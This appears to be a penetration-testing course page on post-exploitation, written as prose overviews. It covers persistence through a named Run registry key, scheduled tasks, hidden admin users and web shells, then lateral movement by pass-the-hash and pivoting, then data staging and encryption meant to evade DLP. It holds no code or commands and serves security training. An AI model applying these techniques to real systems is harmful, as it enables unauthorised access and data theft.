Once the PenTest-er has gained access to the targets, the next step is to establish persistence. This means setting up a way to quickly and easily reconnect to the system later if needed. This could involve installing a backdoor, adding a user account with the right credentials, or using other techniques.

These methods allow the PenTest-er to move through the network, maintain access across multiple machines, and safely exfiltrate data without being detected. After completing the engagement, the PenTest-er will remove any traces of their activity to clean up the systems.

<aside> <img src="/icons/target_red.svg" alt="/icons/target_red.svg" width="40px" />

Mission Objectives

• Create a Backdoor with Metasploit
• Configure Reverse and Bind Shells
• Establish Persistence and Other Post-Exploitation Activities
• Scan for Open Ports from a Remote Computer
• Perform Enumeration of MSSQL with Metasploit
• Perform a Scan using Zenmap
• Bypass Windows Firewall
• Hide File with OpenStego
• Stage and Exfiltrate Using ADS </aside>

1. Establish and Maintain Persistence

Gaining access is difficult; keeping it shouldn't be. Persistence ensures that if a system reboots or a user logs off, the tester doesn't lose their shell.

• Registry Auto-Run Keys: Modifying Windows Registry keys (e.g., HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) to execute a payload on startup.
• Scheduled Tasks & Cron Jobs: Creating automated tasks in Windows (Task Scheduler) or Linux (crontab) to "call home" at specific intervals.
• New User Creation: Adding a hidden administrative user or adding a compromised user to a high-privilege group (e.g., "Domain Admins" or "wheel").
• Web Shells: Leaving a script (PHP, ASPX, JSP) on a web server to maintain command execution via the browser.

2. Move Laterally through Environments

Once a single host is compromised, the tester "pivots" to other systems to find the organization's "Crown Jewels."

• Pivoting & Tunneling: Using a compromised host as a proxy to reach internal segments that are not directly accessible from the internet.
• Pass-the-Hash (PtH) & Pass-the-Ticket (PtT): Using captured NTLM hashes or Kerberos tickets to authenticate to other servers without needing cleartext passwords.
• SSH Port Forwarding: Creating tunnels through SSH to map internal ports to a local machine.
• Living off the Land (LotL): Using native tools like PsExec, SSH, or RDP to move between machines, as these tools are often ignored by security software.

3. Staging and Exfiltration

This is where the "Impact" is proven. It simulates a data breach by preparing and removing sensitive information.

• Data Staging: Gathering sensitive files (spreadsheets, databases, configuration files) into a single, hidden directory on a compromised host.
• Compression & Encryption: Using tools like 7zip or tar to bundle data and encrypt it to bypass Data Loss Prevention (DLP) systems.